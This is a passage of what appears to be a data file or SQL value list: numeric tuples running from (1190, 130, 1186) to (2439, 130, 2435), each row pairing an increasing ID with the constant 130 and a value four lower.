(1190, 130, 1186),
(1191, 130, 1187),
(1192, 130, 1188),
(1193, 130, 1189),
(1194, 130, 1190),
(1195, 130, 1191),
(1196, 130, 1192),
(1197, 130, 1193),
(1198, 130, 1194),
(1199, 130, 1195),
(1200, 130, 1196),
(1201, 130, 1197),
(1202, 130, 1198),
(1203, 130, 1199),
(1204, 130, 1200),
(1205, 130, 1201),
(1206, 130, 1202),
(1207, 130, 1203),
(1208, 130, 1204),
(1209, 130, 1205),
(1210, 130, 1206),
(1211, 130, 1207),
(1212, 130, 1208),
(1213, 130, 1209),
(1214, 130, 1210),
(1215, 130, 1211),
(1216, 130, 1212),
(1217, 130, 1213),
(1218, 130, 1214),
(1219, 130, 1215),
(1220, 130, 1216),
(1221, 130, 1217),
(1222, 130, 1218),
(1223, 130, 1219),
(1224, 130, 1220),
(1225, 130, 1221),
(1226, 130, 1222),
(1227, 130, 1223),
(1228, 130, 1224),
(1229, 130, 1225),
(1230, 130, 1226),
(1231, 130, 1227),
(1232, 130, 1228),
(1233, 130, 1229),
(1234, 130, 1230),
(1235, 130, 1231),
(1236, 130, 1232),
(1237, 130, 1233),
(1238, 130, 1234),
(1239, 130, 1235),
(1240, 130, 1236),
(1241, 130, 1237),
(1242, 130, 1238),
(1243, 130, 1239),
(1244, 130, 1240),
(1245, 130, 1241),
(1246, 130, 1242),
(1247, 130, 1243),
(1248, 130, 1244),
(1249, 130, 1245),
(1250, 130, 1246),
(1251, 130, 1247),
(1252, 130, 1248),
(1253, 130, 1249),
(1254, 130, 1250),
(1255, 130, 1251),
(1256, 130, 1252),
(1257, 130, 1253),
(1258, 130, 1254),
(1259, 130, 1255),
(1260, 130, 1256),
(1261, 130, 1257),
(1262, 130, 1258),
(1263, 130, 1259),
(1264, 130, 1260),
(1265, 130, 1261),
(1266, 130, 1262),
(1267, 130, 1263),
(1268, 130, 1264),
(1269, 130, 1265),
(1270, 130, 1266),
(1271, 130, 1267),
(1272, 130, 1268),
(1273, 130, 1269),
(1274, 130, 1270),
(1275, 130, 1271),
(1276, 130, 1272),
(1277, 130, 1273),
(1278, 130, 1274),
(1279, 130, 1275),
(1280, 130, 1276),
(1281, 130, 1277),
(1282, 130, 1278),
(1283, 130, 1279),
(1284, 130, 1280),
(1285, 130, 1281),
(1286, 130, 1282),
(1287, 130, 1283),
(1288, 130, 1284),
(1289, 130, 1285),
(1290, 130, 1286),
(1291, 130, 1287),
(1292, 130, 1288),
(1293, 130, 1289),
(1294, 130, 1290),
(1295, 130, 1291),
(1296, 130, 1292),
(1297, 130, 1293),
(1298, 130, 1294),
(1299, 130, 1295),
(1300, 130, 1296),
(1301, 130, 1297),
(1302, 130, 1298),
(1303, 130, 1299),
(1304, 130, 1300),
(1305, 130, 1301),
(1306, 130, 1302),
(1307, 130, 1303),
(1308, 130, 1304),
(1309, 130, 1305),
(1310, 130, 1306),
(1311, 130, 1307),
(1312, 130, 1308),
(1313, 130, 1309),
(1314, 130, 1310),
(1315, 130, 1311),
(1316, 130, 1312),
(1317, 130, 1313),
(1318, 130, 1314),
(1319, 130, 1315),
(1320, 130, 1316),
(1321, 130, 1317),
(1322, 130, 1318),
(1323, 130, 1319),
(1324, 130, 1320),
(1325, 130, 1321),
(1326, 130, 1322),
(1327, 130, 1323),
(1328, 130, 1324),
(1329, 130, 1325),
(1330, 130, 1326),
(1331, 130, 1327),
(1332, 130, 1328),
(1333, 130, 1329),
(1334, 130, 1330),
(1335, 130, 1331),
(1336, 130, 1332),
(1337, 130, 1333),
(1338, 130, 1334),
(1339, 130, 1335),
(1340, 130, 1336),
(1341, 130, 1337),
(1342, 130, 1338),
(1343, 130, 1339),
(1344, 130, 1340),
(1345, 130, 1341),
(1346, 130, 1342),
(1347, 130, 1343),
(1348, 130, 1344),
(1349, 130, 1345),
(1350, 130, 1346),
(1351, 130, 1347),
(1352, 130, 1348),
(1353, 130, 1349),
(1354, 130, 1350),
(1355, 130, 1351),
(1356, 130, 1352),
(1357, 130, 1353),
(1358, 130, 1354),
(1359, 130, 1355),
(1360, 130, 1356),
(1361, 130, 1357),
(1362, 130, 1358),
(1363, 130, 1359),
(1364, 130, 1360),
(1365, 130, 1361),
(1366, 130, 1362),
(1367, 130, 1363),
(1368, 130, 1364),
(1369, 130, 1365),
(1370, 130, 1366),
(1371, 130, 1367),
(1372, 130, 1368),
(1373, 130, 1369),
(1374, 130, 1370),
(1375, 130, 1371),
(1376, 130, 1372),
(1377, 130, 1373),
(1378, 130, 1374),
(1379, 130, 1375),
(1380, 130, 1376),
(1381, 130, 1377),
(1382, 130, 1378),
(1383, 130, 1379),
(1384, 130, 1380),
(1385, 130, 1381),
(1386, 130, 1382),
(1387, 130, 1383),
(1388, 130, 1384),
(1389, 130, 1385),
(1390, 130, 1386),
(1391, 130, 1387),
(1392, 130, 1388),
(1393, 130, 1389),
(1394, 130, 1390),
(1395, 130, 1391),
(1396, 130, 1392),
(1397, 130, 1393),
(1398, 130, 1394),
(1399, 130, 1395),
(1400, 130, 1396),
(1401, 130, 1397),
(1402, 130, 1398),
(1403, 130, 1399),
(1404, 130, 1400),
(1405, 130, 1401),
(1406, 130, 1402),
(1407, 130, 1403),
(1408, 130, 1404),
(1409, 130, 1405),
(1410, 130, 1406),
(1411, 130, 1407),
(1412, 130, 1408),
(1413, 130, 1409),
(1414, 130, 1410),
(1415, 130, 1411),
(1416, 130, 1412),
(1417, 130, 1413),
(1418, 130, 1414),
(1419, 130, 1415),
(1420, 130, 1416),
(1421, 130, 1417),
(1422, 130, 1418),
(1423, 130, 1419),
(1424, 130, 1420),
(1425, 130, 1421),
(1426, 130, 1422),
(1427, 130, 1423),
(1428, 130, 1424),
(1429, 130, 1425),
(1430, 130, 1426),
(1431, 130, 1427),
(1432, 130, 1428),
(1433, 130, 1429),
(1434, 130, 1430),
(1435, 130, 1431),
(1436, 130, 1432),
(1437, 130, 1433),
(1438, 130, 1434),
(1439, 130, 1435),
(1440, 130, 1436),
(1441, 130, 1437),
(1442, 130, 1438),
(1443, 130, 1439),
(1444, 130, 1440),
(1445, 130, 1441),
(1446, 130, 1442),
(1447, 130, 1443),
(1448, 130, 1444),
(1449, 130, 1445),
(1450, 130, 1446),
(1451, 130, 1447),
(1452, 130, 1448),
(1453, 130, 1449),
(1454, 130, 1450),
(1455, 130, 1451),
(1456, 130, 1452),
(1457, 130, 1453),
(1458, 130, 1454),
(1459, 130, 1455),
(1460, 130, 1456),
(1461, 130, 1457),
(1462, 130, 1458),
(1463, 130, 1459),
(1464, 130, 1460),
(1465, 130, 1461),
(1466, 130, 1462),
(1467, 130, 1463),
(1468, 130, 1464),
(1469, 130, 1465),
(1470, 130, 1466),
(1471, 130, 1467),
(1472, 130, 1468),
(1473, 130, 1469),
(1474, 130, 1470),
(1475, 130, 1471),
(1476, 130, 1472),
(1477, 130, 1473),
(1478, 130, 1474),
(1479, 130, 1475),
(1480, 130, 1476),
(1481, 130, 1477),
(1482, 130, 1478),
(1483, 130, 1479),
(1484, 130, 1480),
(1485, 130, 1481),
(1486, 130, 1482),
(1487, 130, 1483),
(1488, 130, 1484),
(1489, 130, 1485),
(1490, 130, 1486),
(1491, 130, 1487),
(1492, 130, 1488),
(1493, 130, 1489),
(1494, 130, 1490),
(1495, 130, 1491),
(1496, 130, 1492),
(1497, 130, 1493),
(1498, 130, 1494),
(1499, 130, 1495),
(1500, 130, 1496),
(1501, 130, 1497),
(1502, 130, 1498),
(1503, 130, 1499),
(1504, 130, 1500),
(1505, 130, 1501),
(1506, 130, 1502),
(1507, 130, 1503),
(1508, 130, 1504),
(1509, 130, 1505),
(1510, 130, 1506),
(1511, 130, 1507),
(1512, 130, 1508),
(1513, 130, 1509),
(1514, 130, 1510),
(1515, 130, 1511),
(1516, 130, 1512),
(1517, 130, 1513),
(1518, 130, 1514),
(1519, 130, 1515),
(1520, 130, 1516),
(1521, 130, 1517),
(1522, 130, 1518),
(1523, 130, 1519),
(1524, 130, 1520),
(1525, 130, 1521),
(1526, 130, 1522),
(1527, 130, 1523),
(1528, 130, 1524),
(1529, 130, 1525),
(1530, 130, 1526),
(1531, 130, 1527),
(1532, 130, 1528),
(1533, 130, 1529),
(1534, 130, 1530),
(1535, 130, 1531),
(1536, 130, 1532),
(1537, 130, 1533),
(1538, 130, 1534),
(1539, 130, 1535),
(1540, 130, 1536),
(1541, 130, 1537),
(1542, 130, 1538),
(1543, 130, 1539),
(1544, 130, 1540),
(1545, 130, 1541),
(1546, 130, 1542),
(1547, 130, 1543),
(1548, 130, 1544),
(1549, 130, 1545),
(1550, 130, 1546),
(1551, 130, 1547),
(1552, 130, 1548),
(1553, 130, 1549),
(1554, 130, 1550),
(1555, 130, 1551),
(1556, 130, 1552),
(1557, 130, 1553),
(1558, 130, 1554),
(1559, 130, 1555),
(1560, 130, 1556),
(1561, 130, 1557),
(1562, 130, 1558),
(1563, 130, 1559),
(1564, 130, 1560),
(1565, 130, 1561),
(1566, 130, 1562),
(1567, 130, 1563),
(1568, 130, 1564),
(1569, 130, 1565),
(1570, 130, 1566),
(1571, 130, 1567),
(1572, 130, 1568),
(1573, 130, 1569),
(1574, 130, 1570),
(1575, 130, 1571),
(1576, 130, 1572),
(1577, 130, 1573),
(1578, 130, 1574),
(1579, 130, 1575),
(1580, 130, 1576),
(1581, 130, 1577),
(1582, 130, 1578),
(1583, 130, 1579),
(1584, 130, 1580),
(1585, 130, 1581),
(1586, 130, 1582),
(1587, 130, 1583),
(1588, 130, 1584),
(1589, 130, 1585),
(1590, 130, 1586),
(1591, 130, 1587),
(1592, 130, 1588),
(1593, 130, 1589),
(1594, 130, 1590),
(1595, 130, 1591),
(1596, 130, 1592),
(1597, 130, 1593),
(1598, 130, 1594),
(1599, 130, 1595),
(1600, 130, 1596),
(1601, 130, 1597),
(1602, 130, 1598),
(1603, 130, 1599),
(1604, 130, 1600),
(1605, 130, 1601),
(1606, 130, 1602),
(1607, 130, 1603),
(1608, 130, 1604),
(1609, 130, 1605),
(1610, 130, 1606),
(1611, 130, 1607),
(1612, 130, 1608),
(1613, 130, 1609),
(1614, 130, 1610),
(1615, 130, 1611),
(1616, 130, 1612),
(1617, 130, 1613),
(1618, 130, 1614),
(1619, 130, 1615),
(1620, 130, 1616),
(1621, 130, 1617),
(1622, 130, 1618),
(1623, 130, 1619),
(1624, 130, 1620),
(1625, 130, 1621),
(1626, 130, 1622),
(1627, 130, 1623),
(1628, 130, 1624),
(1629, 130, 1625),
(1630, 130, 1626),
(1631, 130, 1627),
(1632, 130, 1628),
(1633, 130, 1629),
(1634, 130, 1630),
(1635, 130, 1631),
(1636, 130, 1632),
(1637, 130, 1633),
(1638, 130, 1634),
(1639, 130, 1635),
(1640, 130, 1636),
(1641, 130, 1637),
(1642, 130, 1638),
(1643, 130, 1639),
(1644, 130, 1640),
(1645, 130, 1641),
(1646, 130, 1642),
(1647, 130, 1643),
(1648, 130, 1644),
(1649, 130, 1645),
(1650, 130, 1646),
(1651, 130, 1647),
(1652, 130, 1648),
(1653, 130, 1649),
(1654, 130, 1650),
(1655, 130, 1651),
(1656, 130, 1652),
(1657, 130, 1653),
(1658, 130, 1654),
(1659, 130, 1655),
(1660, 130, 1656),
(1661, 130, 1657),
(1662, 130, 1658),
(1663, 130, 1659),
(1664, 130, 1660),
(1665, 130, 1661),
(1666, 130, 1662),
(1667, 130, 1663),
(1668, 130, 1664),
(1669, 130, 1665),
(1670, 130, 1666),
(1671, 130, 1667),
(1672, 130, 1668),
(1673, 130, 1669),
(1674, 130, 1670),
(1675, 130, 1671),
(1676, 130, 1672),
(1677, 130, 1673),
(1678, 130, 1674),
(1679, 130, 1675),
(1680, 130, 1676),
(1681, 130, 1677),
(1682, 130, 1678),
(1683, 130, 1679),
(1684, 130, 1680),
(1685, 130, 1681),
(1686, 130, 1682),
(1687, 130, 1683),
(1688, 130, 1684),
(1689, 130, 1685),
(1690, 130, 1686),
(1691, 130, 1687),
(1692, 130, 1688),
(1693, 130, 1689),
(1694, 130, 1690),
(1695, 130, 1691),
(1696, 130, 1692),
(1697, 130, 1693),
(1698, 130, 1694),
(1699, 130, 1695),
(1700, 130, 1696),
(1701, 130, 1697),
(1702, 130, 1698),
(1703, 130, 1699),
(1704, 130, 1700),
(1705, 130, 1701),
(1706, 130, 1702),
(1707, 130, 1703),
(1708, 130, 1704),
(1709, 130, 1705),
(1710, 130, 1706),
(1711, 130, 1707),
(1712, 130, 1708),
(1713, 130, 1709),
(1714, 130, 1710),
(1715, 130, 1711),
(1716, 130, 1712),
(1717, 130, 1713),
(1718, 130, 1714),
(1719, 130, 1715),
(1720, 130, 1716),
(1721, 130, 1717),
(1722, 130, 1718),
(1723, 130, 1719),
(1724, 130, 1720),
(1725, 130, 1721),
(1726, 130, 1722),
(1727, 130, 1723),
(1728, 130, 1724),
(1729, 130, 1725),
(1730, 130, 1726),
(1731, 130, 1727),
(1732, 130, 1728),
(1733, 130, 1729),
(1734, 130, 1730),
(1735, 130, 1731),
(1736, 130, 1732),
(1737, 130, 1733),
(1738, 130, 1734),
(1739, 130, 1735),
(1740, 130, 1736),
(1741, 130, 1737),
(1742, 130, 1738),
(1743, 130, 1739),
(1744, 130, 1740),
(1745, 130, 1741),
(1746, 130, 1742),
(1747, 130, 1743),
(1748, 130, 1744),
(1749, 130, 1745),
(1750, 130, 1746),
(1751, 130, 1747),
(1752, 130, 1748),
(1753, 130, 1749),
(1754, 130, 1750),
(1755, 130, 1751),
(1756, 130, 1752),
(1757, 130, 1753),
(1758, 130, 1754),
(1759, 130, 1755),
(1760, 130, 1756),
(1761, 130, 1757),
(1762, 130, 1758),
(1763, 130, 1759),
(1764, 130, 1760),
(1765, 130, 1761),
(1766, 130, 1762),
(1767, 130, 1763),
(1768, 130, 1764),
(1769, 130, 1765),
(1770, 130, 1766),
(1771, 130, 1767),
(1772, 130, 1768),
(1773, 130, 1769),
(1774, 130, 1770),
(1775, 130, 1771),
(1776, 130, 1772),
(1777, 130, 1773),
(1778, 130, 1774),
(1779, 130, 1775),
(1780, 130, 1776),
(1781, 130, 1777),
(1782, 130, 1778),
(1783, 130, 1779),
(1784, 130, 1780),
(1785, 130, 1781),
(1786, 130, 1782),
(1787, 130, 1783),
(1788, 130, 1784),
(1789, 130, 1785),
(1790, 130, 1786),
(1791, 130, 1787),
(1792, 130, 1788),
(1793, 130, 1789),
(1794, 130, 1790),
(1795, 130, 1791),
(1796, 130, 1792),
(1797, 130, 1793),
(1798, 130, 1794),
(1799, 130, 1795),
(1800, 130, 1796),
(1801, 130, 1797),
(1802, 130, 1798),
(1803, 130, 1799),
(1804, 130, 1800),
(1805, 130, 1801),
(1806, 130, 1802),
(1807, 130, 1803),
(1808, 130, 1804),
(1809, 130, 1805),
(1810, 130, 1806),
(1811, 130, 1807),
(1812, 130, 1808),
(1813, 130, 1809),
(1814, 130, 1810),
(1815, 130, 1811),
(1816, 130, 1812),
(1817, 130, 1813),
(1818, 130, 1814),
(1819, 130, 1815),
(1820, 130, 1816),
(1821, 130, 1817),
(1822, 130, 1818),
(1823, 130, 1819),
(1824, 130, 1820),
(1825, 130, 1821),
(1826, 130, 1822),
(1827, 130, 1823),
(1828, 130, 1824),
(1829, 130, 1825),
(1830, 130, 1826),
(1831, 130, 1827),
(1832, 130, 1828),
(1833, 130, 1829),
(1834, 130, 1830),
(1835, 130, 1831),
(1836, 130, 1832),
(1837, 130, 1833),
(1838, 130, 1834),
(1839, 130, 1835),
(1840, 130, 1836),
(1841, 130, 1837),
(1842, 130, 1838),
(1843, 130, 1839),
(1844, 130, 1840),
(1845, 130, 1841),
(1846, 130, 1842),
(1847, 130, 1843),
(1848, 130, 1844),
(1849, 130, 1845),
(1850, 130, 1846),
(1851, 130, 1847),
(1852, 130, 1848),
(1853, 130, 1849),
(1854, 130, 1850),
(1855, 130, 1851),
(1856, 130, 1852),
(1857, 130, 1853),
(1858, 130, 1854),
(1859, 130, 1855),
(1860, 130, 1856),
(1861, 130, 1857),
(1862, 130, 1858),
(1863, 130, 1859),
(1864, 130, 1860),
(1865, 130, 1861),
(1866, 130, 1862),
(1867, 130, 1863),
(1868, 130, 1864),
(1869, 130, 1865),
(1870, 130, 1866),
(1871, 130, 1867),
(1872, 130, 1868),
(1873, 130, 1869),
(1874, 130, 1870),
(1875, 130, 1871),
(1876, 130, 1872),
(1877, 130, 1873),
(1878, 130, 1874),
(1879, 130, 1875),
(1880, 130, 1876),
(1881, 130, 1877),
(1882, 130, 1878),
(1883, 130, 1879),
(1884, 130, 1880),
(1885, 130, 1881),
(1886, 130, 1882),
(1887, 130, 1883),
(1888, 130, 1884),
(1889, 130, 1885),
(1890, 130, 1886),
(1891, 130, 1887),
(1892, 130, 1888),
(1893, 130, 1889),
(1894, 130, 1890),
(1895, 130, 1891),
(1896, 130, 1892),
(1897, 130, 1893),
(1898, 130, 1894),
(1899, 130, 1895),
(1900, 130, 1896),
(1901, 130, 1897),
(1902, 130, 1898),
(1903, 130, 1899),
(1904, 130, 1900),
(1905, 130, 1901),
(1906, 130, 1902),
(1907, 130, 1903),
(1908, 130, 1904),
(1909, 130, 1905),
(1910, 130, 1906),
(1911, 130, 1907),
(1912, 130, 1908),
(1913, 130, 1909),
(1914, 130, 1910),
(1915, 130, 1911),
(1916, 130, 1912),
(1917, 130, 1913),
(1918, 130, 1914),
(1919, 130, 1915),
(1920, 130, 1916),
(1921, 130, 1917),
(1922, 130, 1918),
(1923, 130, 1919),
(1924, 130, 1920),
(1925, 130, 1921),
(1926, 130, 1922),
(1927, 130, 1923),
(1928, 130, 1924),
(1929, 130, 1925),
(1930, 130, 1926),
(1931, 130, 1927),
(1932, 130, 1928),
(1933, 130, 1929),
(1934, 130, 1930),
(1935, 130, 1931),
(1936, 130, 1932),
(1937, 130, 1933),
(1938, 130, 1934),
(1939, 130, 1935),
(1940, 130, 1936),
(1941, 130, 1937),
(1942, 130, 1938),
(1943, 130, 1939),
(1944, 130, 1940),
(1945, 130, 1941),
(1946, 130, 1942),
(1947, 130, 1943),
(1948, 130, 1944),
(1949, 130, 1945),
(1950, 130, 1946),
(1951, 130, 1947),
(1952, 130, 1948),
(1953, 130, 1949),
(1954, 130, 1950),
(1955, 130, 1951),
(1956, 130, 1952),
(1957, 130, 1953),
(1958, 130, 1954),
(1959, 130, 1955),
(1960, 130, 1956),
(1961, 130, 1957),
(1962, 130, 1958),
(1963, 130, 1959),
(1964, 130, 1960),
(1965, 130, 1961),
(1966, 130, 1962),
(1967, 130, 1963),
(1968, 130, 1964),
(1969, 130, 1965),
(1970, 130, 1966),
(1971, 130, 1967),
(1972, 130, 1968),
(1973, 130, 1969),
(1974, 130, 1970),
(1975, 130, 1971),
(1976, 130, 1972),
(1977, 130, 1973),
(1978, 130, 1974),
(1979, 130, 1975),
(1980, 130, 1976),
(1981, 130, 1977),
(1982, 130, 1978),
(1983, 130, 1979),
(1984, 130, 1980),
(1985, 130, 1981),
(1986, 130, 1982),
(1987, 130, 1983),
(1988, 130, 1984),
(1989, 130, 1985),
(1990, 130, 1986),
(1991, 130, 1987),
(1992, 130, 1988),
(1993, 130, 1989),
(1994, 130, 1990),
(1995, 130, 1991),
(1996, 130, 1992),
(1997, 130, 1993),
(1998, 130, 1994),
(1999, 130, 1995),
(2000, 130, 1996),
(2001, 130, 1997),
(2002, 130, 1998),
(2003, 130, 1999),
(2004, 130, 2000),
(2005, 130, 2001),
(2006, 130, 2002),
(2007, 130, 2003),
(2008, 130, 2004),
(2009, 130, 2005),
(2010, 130, 2006),
(2011, 130, 2007),
(2012, 130, 2008),
(2013, 130, 2009),
(2014, 130, 2010),
(2015, 130, 2011),
(2016, 130, 2012),
(2017, 130, 2013),
(2018, 130, 2014),
(2019, 130, 2015),
(2020, 130, 2016),
(2021, 130, 2017),
(2022, 130, 2018),
(2023, 130, 2019),
(2024, 130, 2020),
(2025, 130, 2021),
(2026, 130, 2022),
(2027, 130, 2023),
(2028, 130, 2024),
(2029, 130, 2025),
(2030, 130, 2026),
(2031, 130, 2027),
(2032, 130, 2028),
(2033, 130, 2029),
(2034, 130, 2030),
(2035, 130, 2031),
(2036, 130, 2032),
(2037, 130, 2033),
(2038, 130, 2034),
(2039, 130, 2035),
(2040, 130, 2036),
(2041, 130, 2037),
(2042, 130, 2038),
(2043, 130, 2039),
(2044, 130, 2040),
(2045, 130, 2041),
(2046, 130, 2042),
(2047, 130, 2043),
(2048, 130, 2044),
(2049, 130, 2045),
(2050, 130, 2046),
(2051, 130, 2047),
(2052, 130, 2048),
(2053, 130, 2049),
(2054, 130, 2050),
(2055, 130, 2051),
(2056, 130, 2052),
(2057, 130, 2053),
(2058, 130, 2054),
(2059, 130, 2055),
(2060, 130, 2056),
(2061, 130, 2057),
(2062, 130, 2058),
(2063, 130, 2059),
(2064, 130, 2060),
(2065, 130, 2061),
(2066, 130, 2062),
(2067, 130, 2063),
(2068, 130, 2064),
(2069, 130, 2065),
(2070, 130, 2066),
(2071, 130, 2067),
(2072, 130, 2068),
(2073, 130, 2069),
(2074, 130, 2070),
(2075, 130, 2071),
(2076, 130, 2072),
(2077, 130, 2073),
(2078, 130, 2074),
(2079, 130, 2075),
(2080, 130, 2076),
(2081, 130, 2077),
(2082, 130, 2078),
(2083, 130, 2079),
(2084, 130, 2080),
(2085, 130, 2081),
(2086, 130, 2082),
(2087, 130, 2083),
(2088, 130, 2084),
(2089, 130, 2085),
(2090, 130, 2086),
(2091, 130, 2087),
(2092, 130, 2088),
(2093, 130, 2089),
(2094, 130, 2090),
(2095, 130, 2091),
(2096, 130, 2092),
(2097, 130, 2093),
(2098, 130, 2094),
(2099, 130, 2095),
(2100, 130, 2096),
(2101, 130, 2097),
(2102, 130, 2098),
(2103, 130, 2099),
(2104, 130, 2100),
(2105, 130, 2101),
(2106, 130, 2102),
(2107, 130, 2103),
(2108, 130, 2104),
(2109, 130, 2105),
(2110, 130, 2106),
(2111, 130, 2107),
(2112, 130, 2108),
(2113, 130, 2109),
(2114, 130, 2110),
(2115, 130, 2111),
(2116, 130, 2112),
(2117, 130, 2113),
(2118, 130, 2114),
(2119, 130, 2115),
(2120, 130, 2116),
(2121, 130, 2117),
(2122, 130, 2118),
(2123, 130, 2119),
(2124, 130, 2120),
(2125, 130, 2121),
(2126, 130, 2122),
(2127, 130, 2123),
(2128, 130, 2124),
(2129, 130, 2125),
(2130, 130, 2126),
(2131, 130, 2127),
(2132, 130, 2128),
(2133, 130, 2129),
(2134, 130, 2130),
(2135, 130, 2131),
(2136, 130, 2132),
(2137, 130, 2133),
(2138, 130, 2134),
(2139, 130, 2135),
(2140, 130, 2136),
(2141, 130, 2137),
(2142, 130, 2138),
(2143, 130, 2139),
(2144, 130, 2140),
(2145, 130, 2141),
(2146, 130, 2142),
(2147, 130, 2143),
(2148, 130, 2144),
(2149, 130, 2145),
(2150, 130, 2146),
(2151, 130, 2147),
(2152, 130, 2148),
(2153, 130, 2149),
(2154, 130, 2150),
(2155, 130, 2151),
(2156, 130, 2152),
(2157, 130, 2153),
(2158, 130, 2154),
(2159, 130, 2155),
(2160, 130, 2156),
(2161, 130, 2157),
(2162, 130, 2158),
(2163, 130, 2159),
(2164, 130, 2160),
(2165, 130, 2161),
(2166, 130, 2162),
(2167, 130, 2163),
(2168, 130, 2164),
(2169, 130, 2165),
(2170, 130, 2166),
(2171, 130, 2167),
(2172, 130, 2168),
(2173, 130, 2169),
(2174, 130, 2170),
(2175, 130, 2171),
(2176, 130, 2172),
(2177, 130, 2173),
(2178, 130, 2174),
(2179, 130, 2175),
(2180, 130, 2176),
(2181, 130, 2177),
(2182, 130, 2178),
(2183, 130, 2179),
(2184, 130, 2180),
(2185, 130, 2181),
(2186, 130, 2182),
(2187, 130, 2183),
(2188, 130, 2184),
(2189, 130, 2185),
(2190, 130, 2186),
(2191, 130, 2187),
(2192, 130, 2188),
(2193, 130, 2189),
(2194, 130, 2190),
(2195, 130, 2191),
(2196, 130, 2192),
(2197, 130, 2193),
(2198, 130, 2194),
(2199, 130, 2195),
(2200, 130, 2196),
(2201, 130, 2197),
(2202, 130, 2198),
(2203, 130, 2199),
(2204, 130, 2200),
(2205, 130, 2201),
(2206, 130, 2202),
(2207, 130, 2203),
(2208, 130, 2204),
(2209, 130, 2205),
(2210, 130, 2206),
(2211, 130, 2207),
(2212, 130, 2208),
(2213, 130, 2209),
(2214, 130, 2210),
(2215, 130, 2211),
(2216, 130, 2212),
(2217, 130, 2213),
(2218, 130, 2214),
(2219, 130, 2215),
(2220, 130, 2216),
(2221, 130, 2217),
(2222, 130, 2218),
(2223, 130, 2219),
(2224, 130, 2220),
(2225, 130, 2221),
(2226, 130, 2222),
(2227, 130, 2223),
(2228, 130, 2224),
(2229, 130, 2225),
(2230, 130, 2226),
(2231, 130, 2227),
(2232, 130, 2228),
(2233, 130, 2229),
(2234, 130, 2230),
(2235, 130, 2231),
(2236, 130, 2232),
(2237, 130, 2233),
(2238, 130, 2234),
(2239, 130, 2235),
(2240, 130, 2236),
(2241, 130, 2237),
(2242, 130, 2238),
(2243, 130, 2239),
(2244, 130, 2240),
(2245, 130, 2241),
(2246, 130, 2242),
(2247, 130, 2243),
(2248, 130, 2244),
(2249, 130, 2245),
(2250, 130, 2246),
(2251, 130, 2247),
(2252, 130, 2248),
(2253, 130, 2249),
(2254, 130, 2250),
(2255, 130, 2251),
(2256, 130, 2252),
(2257, 130, 2253),
(2258, 130, 2254),
(2259, 130, 2255),
(2260, 130, 2256),
(2261, 130, 2257),
(2262, 130, 2258),
(2263, 130, 2259),
(2264, 130, 2260),
(2265, 130, 2261),
(2266, 130, 2262),
(2267, 130, 2263),
(2268, 130, 2264),
(2269, 130, 2265),
(2270, 130, 2266),
(2271, 130, 2267),
(2272, 130, 2268),
(2273, 130, 2269),
(2274, 130, 2270),
(2275, 130, 2271),
(2276, 130, 2272),
(2277, 130, 2273),
(2278, 130, 2274),
(2279, 130, 2275),
(2280, 130, 2276),
(2281, 130, 2277),
(2282, 130, 2278),
(2283, 130, 2279),
(2284, 130, 2280),
(2285, 130, 2281),
(2286, 130, 2282),
(2287, 130, 2283),
(2288, 130, 2284),
(2289, 130, 2285),
(2290, 130, 2286),
(2291, 130, 2287),
(2292, 130, 2288),
(2293, 130, 2289),
(2294, 130, 2290),
(2295, 130, 2291),
(2296, 130, 2292),
(2297, 130, 2293),
(2298, 130, 2294),
(2299, 130, 2295),
(2300, 130, 2296),
(2301, 130, 2297),
(2302, 130, 2298),
(2303, 130, 2299),
(2304, 130, 2300),
(2305, 130, 2301),
(2306, 130, 2302),
(2307, 130, 2303),
(2308, 130, 2304),
(2309, 130, 2305),
(2310, 130, 2306),
(2311, 130, 2307),
(2312, 130, 2308),
(2313, 130, 2309),
(2314, 130, 2310),
(2315, 130, 2311),
(2316, 130, 2312),
(2317, 130, 2313),
(2318, 130, 2314),
(2319, 130, 2315),
(2320, 130, 2316),
(2321, 130, 2317),
(2322, 130, 2318),
(2323, 130, 2319),
(2324, 130, 2320),
(2325, 130, 2321),
(2326, 130, 2322),
(2327, 130, 2323),
(2328, 130, 2324),
(2329, 130, 2325),
(2330, 130, 2326),
(2331, 130, 2327),
(2332, 130, 2328),
(2333, 130, 2329),
(2334, 130, 2330),
(2335, 130, 2331),
(2336, 130, 2332),
(2337, 130, 2333),
(2338, 130, 2334),
(2339, 130, 2335),
(2340, 130, 2336),
(2341, 130, 2337),
(2342, 130, 2338),
(2343, 130, 2339),
(2344, 130, 2340),
(2345, 130, 2341),
(2346, 130, 2342),
(2347, 130, 2343),
(2348, 130, 2344),
(2349, 130, 2345),
(2350, 130, 2346),
(2351, 130, 2347),
(2352, 130, 2348),
(2353, 130, 2349),
(2354, 130, 2350),
(2355, 130, 2351),
(2356, 130, 2352),
(2357, 130, 2353),
(2358, 130, 2354),
(2359, 130, 2355),
(2360, 130, 2356),
(2361, 130, 2357),
(2362, 130, 2358),
(2363, 130, 2359),
(2364, 130, 2360),
(2365, 130, 2361),
(2366, 130, 2362),
(2367, 130, 2363),
(2368, 130, 2364),
(2369, 130, 2365),
(2370, 130, 2366),
(2371, 130, 2367),
(2372, 130, 2368),
(2373, 130, 2369),
(2374, 130, 2370),
(2375, 130, 2371),
(2376, 130, 2372),
(2377, 130, 2373),
(2378, 130, 2374),
(2379, 130, 2375),
(2380, 130, 2376),
(2381, 130, 2377),
(2382, 130, 2378),
(2383, 130, 2379),
(2384, 130, 2380),
(2385, 130, 2381),
(2386, 130, 2382),
(2387, 130, 2383),
(2388, 130, 2384),
(2389, 130, 2385),
(2390, 130, 2386),
(2391, 130, 2387),
(2392, 130, 2388),
(2393, 130, 2389),
(2394, 130, 2390),
(2395, 130, 2391),
(2396, 130, 2392),
(2397, 130, 2393),
(2398, 130, 2394),
(2399, 130, 2395),
(2400, 130, 2396),
(2401, 130, 2397),
(2402, 130, 2398),
(2403, 130, 2399),
(2404, 130, 2400),
(2405, 130, 2401),
(2406, 130, 2402),
(2407, 130, 2403),
(2408, 130, 2404),
(2409, 130, 2405),
(2410, 130, 2406),
(2411, 130, 2407),
(2412, 130, 2408),
(2413, 130, 2409),
(2414, 130, 2410),
(2415, 130, 2411),
(2416, 130, 2412),
(2417, 130, 2413),
(2418, 130, 2414),
(2419, 130, 2415),
(2420, 130, 2416),
(2421, 130, 2417),
(2422, 130, 2418),
(2423, 130, 2419),
(2424, 130, 2420),
(2425, 130, 2421),
(2426, 130, 2422),
(2427, 130, 2423),
(2428, 130, 2424),
(2429, 130, 2425),
(2430, 130, 2426),
(2431, 130, 2427),
(2432, 130, 2428),
(2433, 130, 2429),
(2434, 130, 2430),
(2435, 130, 2431),
(2436, 130, 2432),
(2437, 130, 2433),
(2438, 130, 2434),
(2439, 130, 2435),
